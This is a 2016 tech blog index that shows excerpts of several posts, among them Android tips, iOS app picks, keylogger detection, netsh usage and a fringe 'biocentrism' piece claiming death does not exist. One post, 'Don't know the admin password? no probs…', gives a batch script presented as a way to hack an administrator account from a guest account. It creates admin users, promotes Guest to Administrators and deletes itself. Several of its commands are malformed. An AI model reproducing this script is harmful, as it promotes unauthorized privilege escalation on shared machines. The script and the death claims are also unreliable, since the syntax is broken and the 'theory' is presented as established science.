Skip to main content

Posts

Showing posts from 2016

How to recover lost notifications in an Android Smartphone

With all the hurry in our lives’ these days, it is very possible you would’ve swiped some very important notifications into non-existance. Well,if you have you’re at the right place then, buddy. HOW TO RECOVER LOST NOTIFICATIONS IN AN ANDROID SMARTPHONE. Note – only for Android 4.3+ 1. First of all, long press an empty space on your home screen and tap widgets. 2. Select the ‘setting shortcut’ widget and drag it to any empty space on the home screen . 3. Next, you will be taken to a new window where you gotta select the setting you want the shortcut of. 4. Scroll down and select ‘Notification log’ or anything related to notifications. 5. Now you’ll see the shortcut on the home screen, tap on it. Here you go!!! The notifications swiped out are in gray and the ones still there in your notification panel are in white. Tap on a notification to go to the source app. I hope this tutorial helped you ;) . Brb with more Awesomeness

Protect your Google Accounts with a USB Security Key

Most big-name web services like Gmail, Microsoft, Evernote, WordPress and Dropbox now support 2-step authentication to improve the security of your online accounts. Once you enable two-factor authentication, a malicious person will not be able to log into your online account even if they know the password – they’ll need access to your mobile phone as well to get in. The verification codes required for logging into a 2-step enabled account can be generated either using a mobile app – like Authy or Google Authenticator – or you can have them sent to your mobile phone via a text message or a voice call. The latter option however will not work if the mobile phone associated with your account is outside the coverage area (like when you are in a foreign country). There’s another option that makes the process of logging into a 2-factor enabled account Google less cumbersome. Instead of generating the verification codes on a mobile phone,  you can use a hardware based authentica

THE BEST IOS APPS 2016

    Got a new iPhone 6s or iPhone 6s Plus ? Are you expecting one for Christmas? Fire up the App Store and make some space on your device as we have compiled a list of some of our favorite iPhone apps that’ll help you make the most of your shiny new iPhone. Best Camera app:  Camera+ Camera+ is the best third-party camera app for the iPhone. It comes with an intuitive interface, photo filters, horizontal leveler and provides advanced composition controls that allow you to adjust almost everything from exposure to focus, photo filters. ➤ Download link – $2.99 Alternative: VSCO Cam for its awesome filters – Download link  – Free Best Twitter app:  Tweetbot Tweetbot is the best iOS Twitter client out there, with features like muting, timeline sync, day/night themes, multiple accounts and more. The iPhone version of the app has been updated for iOS 8, and optimized for iPhone 6 and iPhone 6 Plus. ➤ Download link – $2.99 Free alternative: Twitter’s Official app – Download

Maximise your gadget’s life…

Your device have good lithium ion batteries that put you in a dillema of choosing over charging your device day in day out or to wait till it sinks to 0% and then charge it for an hour or so…… To take you out of this very dillema , here are the steps how to maximise the battery life of your gadgets. 1. Don’t let it drop below 30%. Charge your devices multiple times a day in short charge bursts. The average capacity is 40 to 70 perc3nt and anuwhere below 30 percent can give you good charging time… 2. If you are planning to store it for a longer period , then charge it upto or drain yhe charge upto 50%. If it is 100 , drain it to 50. 3. Do not leave your gadget in places that tend to get very hot , say , in a car on a hot afternoon as temperatures  above 36 degress can permanantly damage your gadget’s battery. 4.  It is OK to leave your mobile phone plugged in at night for charging but the mobile case could be an issue. The heat generated during the charging needs an exit ve

How to capture video screenshots in Android L without rooting your device.

Some apps on the playstore are free which even show interactive touches without the finger for better videos. MIRROR But the best option is mirror that will not onky record videos but also mirror it to your laptop via allcast chrome. The only down point of this app is that it comes with a very big and clearly visible watermark that is heavwnly i possibble to disable. SHOU.TV This app , also mirrors video screenshots and is the only app that has formats like MKV , AVI , MOV. The drawback is a lag while the mirroring that makes it less useful. ILOS , REVOLOUS , AND HEROCAT These apps let you record videos in any resolution at 30 frames pe second , you get no adds , touches are diplayes and you can even record videos of u limited lenght. But then , they add their logos in the notification  window. TELECINE Now this app has a very simple ui and gives you a 3 second countdown too. By just tapp7ng the invisible zone on yiur device (rather than tapping the logo i  the notification  sc

New Google Input App let’s you handwrite messages!

Google has released a new standalone app which can replace your current keyboard and will let you write on the screen instead of typing on it. The new input method works in Android smartphones as well as in Android tablets. The newly launched  Google input method supports more than 82 languages in 20 distinct scripts . The good thing is that it recognizes various writing styles as well as cursive writing. Users can use the input method with styles or they can either use fingers. Another fun feature is the addition of Emojis which users can draw directly. The  handwriting to text feature  has been available from early 2012 when it was limited to Google search and worked with an Internet connection. But Google has finally been able to integrate various languages and the new Google Handwriting app can work with or without an Internet connection. The new Google Input Method is now available for download and works only with devices running on Android 4.0.3 or above.

Now create an apple id of wherever in the world you like and absolutely without a credit card.

Learn how to create an Apple ID for the US or UK iTunes Apps Store but without entering your credit card or PayPal information. Some apps, Google Earth for example, are available as free downloads in the iTunes Apps store but you need a UK or US based Apple ID to install them on to your iPad or Phone. Similarly, some iBooks and podcasts have geo restrictions and may only be available to iTunes users who are logged in with an Apple ID for one of the available countries. The workaround is simple. You can create multiple Apple IDs – like one for UK and another one for US Apps Store – and easily switch between them inside iTunes. So if you are signed-in from India, you can switch to the US store, login with your US based Apple ID and download the app that is otherwise not available in the Indian Apps Store. There’s however a problem. When you create a new Apple ID, iTunes will require you to enter your credit card and the billing address of your card should be in that country.

Does death exist? New theory says “NO”

Many of us fear death. We believe in death because we have been told we will die. We associate ourselves with the body, and we know that bodies die. But a new scientific theory suggests that death is not the terminal event we think. One well-known aspect of quantum physics is that certain observations cannot be predicted absolutely. Instead, there is a range of possible observations each with a different probability. One mainstream explanation, the “many-worlds” interpretation, states that each of these possible observations corresponds to a different universe (the ‘multiverse’). A new scientific theory – called biocentrism– refines these ideas. There are an infinite number of universes, and everything that could possibly happen occurs in some universe. Death does not exist in any real sense in these scenarios. All possible universes exist simultaneously, regardless of what happens in any of them. Although individual bodies are destined to self-destruct, the alive feeling

How to Create YouTube Playlists without Logging In

Learn how to quickly create a YouTube playlist with your favorite YouTube videos but without logging into your Google Account. How do you share a collection of YouTube videos in an email newsletter or on the social media. The best option is that you create a new YouTube playlist, add all the videos and then share the link (URL) of the playlist. The privacy of the YouTube playlist can be set to Unlisted if you would like to hide your video list from search engines. It is easy to build playlists in YouTube but they are always connected to your YouTube channel or Google Account – you cannot create a playlist on YouTube anonymously without logging in to your account. There’s however a simple URL hack that will let you create “virtual” playlists on YouTube – they are like regular playlists except that they are not connected to any Google account and you can still add or remove videos on the fly. Create YouTube Playlists on the fly All YouTube videos have a unique video ID and y

The era of Minimalism in Web Design

The extraordinary brashness (or rather, brash extraordinariness) of overtly stylized webs with all the bells and whistles on never arouses indifference in their beholder. While some old-school designers continue in their attempt to create websites with spellbinding effects and to adorn their designs with colorful and glossy elements, the advocates of flat designs are growing at a brisk rate. Minimalism may or may not have replaced extravagance in web design as yet, but it is, without doubt, a trend that has only been getting trendier. In its bare bones, you call a design flat or minimal when it gets rid of its stylized and glossy attributes . What’s left is subtle, yet, equally fascinating. However, it has to be done right otherwise it just turns out to be dull. So, you remove the effects like shadows, fancy fonts, multiple colors, and any and all scream-out-loud effects, etc. Flat Designs Is What Everyone Seems To Be Leaning Towards World Baking Day There are reasons to

Can I determine if my computer has a key logger installed? – YES!!!

Detecting keyloggers is as simple as looking in the right place (which may or may not be simple depending on your viewpoint). The problem is knowing what to look for and where. What follows is a non-exhaustive few things you could do to check for keylogging modules. Firstly, the obvious easy way to build a keylogger is to use DLL Injection which can be achieved a number of ways. Most of these will result in a DLL showing up as mapped to the process’s address space. Take a look at this picture: What is the topmost entry in that list? It’s a pyd , or python extension, file. I’ve been messing with python-implemented COM servers and as a result, the DLL is loaded into Windows Explorer’s address space. DLL Injection of the keylogging variety will load its DLL into all of the target address spaces – can’t capture everything if you don’t. So one thing to look out for would be strange DLLs you cannot attribute to products whose purpose you know. They’ll show up in this list for

How to Use the NETSH Command to Change from Static IP Address to DHCP

You can use the netsh command in Windows 2000 to script the process of changing a computer from a static Internet Protocol (IP) address to Dynamic Host Configuration Protocol (DHCP) or vice versa. The netsh command accomplishes this task without the need to restart the computer. This feature is particularly useful for laptops that move from one environment to another, when it is necessary to use statically assigned IP addresses at one location and DHCP assigned IP addresses at another. To switch the specified adapter from a static address to DHCP, type the following command: netsh interface ip set address “Local Area Connection” dhcp NOTE: Typing this command changes the interface named “Local Area Connection” to DHCP. To display all of the adapters in the computer with their current IP addresses to determine the correct adapter name, type the following command: Netsh interface ip show config To change to a static address, type the following command: netsh interface ip set

Don’t know the admin password? no probs…

Hack Administrator Account from Guest Account?.Yes!! that is quite possible.All you need to do is to follow the below procedure. echo off title Please wait… cls net user add Username Password /add net user localgroup Administrators Username /add net user Guest 420 /active:yes net localgroup Guests Guest /DELETE net localgroup Administrators Guest /add del %0 Copy this to notepad and save the file as “Guest2admin.bat” then u can double click the file to execute or run in the cmd. it works…

Live inside technology

Microsoft doesn’t just want you to use the latest Windows; it wants you to live inside of it. The company has revealed the HoloLens, a wearable holographic computer launching alongside Windows 10 that lets you project Windows apps onto the surfaces of your home or office. Holographic Fetus & Other Incredible 3D Tech 3D scanners are enabling us to see all kinds of things we’ve never dreamed of witnessing before. Microsoft outlined some of the uses of HoloLens in a demo video, which showcases how Windows apps can come to life once you put the headset on. Some examples include the ability to see Windows app icons on your kitchen cabinet, project a Skype call onto your wall and even physically manipulate a Minecraft world that’s laid out on your coffee table. The HoloLens itself is a black headset with a circular plastic headband and sunglass-like, see-through lenses in the front. The device uses a “high-end” processor and GPU, with an additional holographic processing uni

Turn yourself into a battery…

In the sci-fi classic The Matrix, one of the film’s most bananas moments reveals that futuristic machines are using cocooned human bodies as a kind of bioelectric power source. Those rascally science fiction writers — always with the crazy concepts. Smart Shoes Power Up Your Wearables When You Walk Well, it turns out the people-as-batteries scenario is actually well on its way. A new device unveiled last week at a European research conference is designed to do just that — tapping the energy of human body to generate power for wearable computers and devices. The postage-stamp sized generator, developed by researchers at the National University of Singapore, actually leverages the power of static electricity. When certain kinds of dissimilar surfaces are put in close contact, an electrical charge builds that can be harvested when the surfaces are flexed or pulled apart. The phenomenon is called the triboelectric effect, and the new device radically miniaturizes the approac

The universe higg(up)s

Stephen Hawking bet Gordon Kane $100 that physicists would not discover the Higgs boson. After losing that bet when physicists detected the particle in 2012, Hawking lamented the discovery, saying it made physics less interesting. Now, in the preface to a new collection of essays and lectures called “Starmus,” the famous theoretical physicist is warning that the particle could one day be responsible for the destruction of the known universe. Hawking is not the only scientist who thinks so. The theory of a Higgs boson doomsday, where a quantum fluctuation creates a vacuum “bubble” that expands through space and wipes out the universe, has existed for a while. However, scientists don’t think it could happen anytime soon. “Most likely it will take 10 to the 100 years [a 1 followed by 100 zeroes] for this to happen, so probably you shouldn’t sell your house and you should continue to pay your taxes,” Joseph Lykken, a theoretical physicist at the Fermi National Accelerator La

Wanna become a cyber-forencics expert?

Get clued into the super-secret world of cyber forensics. Here’s how you can become a digital detective. Cyber Forensics (or ‘Digital Forensics’) deals with evidence found on computers and digital storage media that’s related to crime scene investigations. If the idea of tracing back a crime to unravel the truth gets your adrenaline pumping, this is the job for you. While the skills required to collect digital evidence and data may  be difficult to acquire, once you’ve mastered them, you can proudly call yourself the Sherlock Holmes of cyber crime. Though on the façade, digital forensics may appear different from real-world forensics, the sciences are quite similar at the conceptual level. Information retrieval Gathering evidence without contaminating the scene is a key part of the process. If you contaminate the source of evidence, the rest of the case is on an unsure track already. Which is why it is of foremost importance that evidence media − called “exhibit” in legal te

The Megapixel Masquerade…

Background Imagine a world where a camera can be dubbed “14 megapixel” when it has 4.6 million pixels on its imaging sensor while at the same time, another camera can be dubbed “10 megapixel” when it has no pixels at all on its imaging sensor. Sound like a strange world? Maybe, but it’s the world we live in today! Evolving technologies are making it more difficult to define exactly what is meant by the term “megapixel” and is blurring camera specifications to the point that many people no longer know how to compare cameras by the specs alone. In this article, I will try to explain how manufacturers come up with their marketing regarding the term “megapixels”. Pixel: a definition Wikipedia defines a picture element, or pixel, as “the smallest complete sample of an image”. Others use similar terminology such as “the smallest discrete component of an image”. The key here is that we are talking about the smallest element in an image: that is, the final picture or photograph.

Create a custom virtual machine…

A custom virtual machine simply means a virtual machine you create using the From Gallery option because it gives you more configuration choices than the Quick Create option. These choices include: Connecting the VM to a virtual network Installing the VM Agent and extensions, such as for antimalware Adding the VM to an existing cloud service Adding the VM to an availability set Important : If you want your virtual machine to use a virtual network so you can connect to it directly by hostname or set up cross-premises connections, make sure you specify the virtual network when you create the virtual machine. A virtual machine can be configured to join a virtual network only when you create the virtual machine. For details on virtual networks, see Azure Virtual Network Overview. Sign in to the Azure Management Portal. Check out the Free Trial offer if you don’t have a subscription yet. On the command bar at the bottom of the window, click New . Under Compute , click Virtual Mach